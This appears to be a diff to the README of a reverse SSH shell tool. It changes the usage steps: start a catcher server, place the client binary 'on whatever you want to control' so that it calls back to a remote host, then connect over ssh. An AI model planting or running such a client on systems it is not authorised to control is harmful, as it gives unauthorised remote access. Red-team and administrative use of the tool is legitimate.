NHAS/reverse_ssh/README.md

 You will need to create an `authorized_keys` file, containing *your* public key.
 This will allow you to control whatever server catches.
+Alternatively, you can use the --authorizedkeys flag to point to a file.

 ```sh
 cp ~/.ssh/id_ed25519.pub authorized_keys
 ./server 0.0.0.0:3232 #Set the server to listen on port 3232
 ```

-Put the client binary on whatever you want to control.
+Put the client binary on whatever you want to control, then connect to the server.

 ```sh
 ./client yourserver.com:3232
 ```

-Then connect to your reverse shell catcher server:
+Finally connect to your reverse shell catcher server to administrate, connect through etc:

 ```sh
 ssh yourserver.com -p 3232